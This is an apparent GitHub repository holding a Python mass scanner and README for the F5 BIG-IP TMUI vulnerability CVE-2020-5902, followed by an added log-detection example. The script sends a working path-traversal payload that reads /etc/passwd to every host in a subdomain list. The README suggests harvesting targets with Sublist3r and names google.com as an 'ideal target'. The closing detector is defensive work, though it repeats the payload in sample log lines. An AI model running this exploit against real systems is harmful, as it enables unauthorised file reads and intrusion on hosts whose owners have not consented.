├── CVE-2020-5902.py
└── README.md


/CVE-2020-5902.py:
--------------------------------------------------------------------------------
import subprocess

author = """
Author    : Pushpender Singh
Written In: Python 3
GitHub    : github.com/PushpenderIndia

"""

print(author)
print("[**********************************************************************]")
print("[*] Automated Scanner For F5 BIG IP CVE-2020-5902 Remote Code Execution")
print("[**********************************************************************]")

# Request path checked on every host: a file read of /etc/passwd through TMUI.
path = "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"

subdomains = input("[?] Enter Subdomain Path: ")
subdomains_list = []

# Load one host per line, skipping blank lines.
with open(subdomains, 'r') as f:
    for subdomain in f.readlines():
        if subdomain.strip():
            subdomains_list.append(subdomain.strip())

print(f"[>>] Total Subdomains Loaded: {len(subdomains_list)}")

for subdomain in subdomains_list:
    try:
        # curl gets its arguments as a list, not through shell=True: a POSIX shell
        # treats the ';' in the path as a command separator, and it would also
        # interpret any metacharacters in lines read from the input file.
        exploit_using_curl = subprocess.check_output(["curl", "-sk", f"https://{subdomain}{path}"])
        if exploit_using_curl == b'':
            # Empty HTTPS response: retry over plain HTTP.
            exploit_using_curl = subprocess.check_output(["curl", "-sk", f"http://{subdomain}{path}"])
    except Exception:
        # curl failed (non-zero exit, host unreachable, curl missing): flag for manual review.
        exploit_using_curl = b'test_manual'

    if b'root:x:0:0:root' in exploit_using_curl:
        print(f"\033[0;31m[+] {subdomain} Vulnerable\033[0m")

    elif b'test_manual' in exploit_using_curl:
        print(f"\033[97m[-] [Exception Occurred, Try Manually] : {subdomain}\033[0m")

    else:
        print(f"\033[0;32m[-] {subdomain} Not Vulnerable\033[0m")


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# CVE-2020-5902-Scanner
Automated F5 Big IP Remote Code Execution (CVE-2020-5902) Scanner Written In Python 3

## Vulnerability Description
F5 disclosed a critical Remote Code Execution vulnerability (CVE-2020-5902) on 30th June 2020 that affects several versions of Big IP.
An attacker can easily exploit the RCE & LFI present in undisclosed pages of the TMUI (Traffic Management User Interface).

In short, it is a variant of a Remote Code Execution & Local File Inclusion vulnerability with a CVSS score of 10.

## Installation
```
# For Windows
$ python -m pip install requests

# OR

# For Linux
$ sudo apt-get install python3-pip
$ sudo pip3 install requests
```

## Usage

Ideal Target For This Script: `google.com`

Don't give targets of this type: `https://google.com` or `http://google.com`

```
# For Windows
$ python CVE-2020-5902.py

# For Linux
$ python3 CVE-2020-5902.py
```

## Use cases
```
# Enumerating Subdomains Using Sublist3r
$ python sublist3r.py -d google.com -o google.com.txt

# Giving This Subdomain List to CVE-2020-5902.py
$ python CVE-2020-5902.py
```


--------------------------------------------------------------------------------
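
The request this scanner sends has a recognisable shape: a `..;` path segment under `/tmui/`. The following is an added example, not part of this repository, that flags such requests in an access log; it goes slightly beyond the script's literal URL by percent-decoding the path first. The combined log format, the sample lines and the names `SAMPLE_LOG` and `find_tmui_traversal` are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines (combined log format, documentation-range addresses).
SAMPLE_LOG = """\
203.0.113.7 - - [06/Jul/2020:10:01:02 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [06/Jul/2020:10:01:09 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1873 "-" "curl/7.68.0"
198.51.100.23 - - [06/Jul/2020:10:01:10 +0000] "GET /tmui/login.jsp/..%3b/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts HTTP/1.1" 404 0 "-" "curl/7.68.0"
192.0.2.55 - - [06/Jul/2020:10:02:30 +0000] "GET /index.html;jsessionid=abc HTTP/1.1" 200 312 "-" "Mozilla/5.0"
"""

# client, method, request target and status from one combined-format line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def find_tmui_traversal(log_text):
    """Return one dict per request whose decoded path has a '..;' segment under /tmui/."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        client, _method, target, status = m.groups()
        parts = urlsplit(target)
        path = unquote(parts.path)  # also catches the ';' sent as %3b
        if path.startswith("/tmui/") and "..;" in path:
            hits.append({
                "client": client,
                "status": int(status),  # kept so 200 responses can be triaged first
                "jsp": path.rsplit("/", 1)[-1],
                "file": parse_qs(parts.query).get("fileName", [None])[0],
            })
    return hits


if __name__ == "__main__":
    for hit in find_tmui_traversal(SAMPLE_LOG):
        print(hit)
```

A `;` elsewhere in a URL, as in the last sample line, is not flagged; only the `..;` segment under `/tmui/` is.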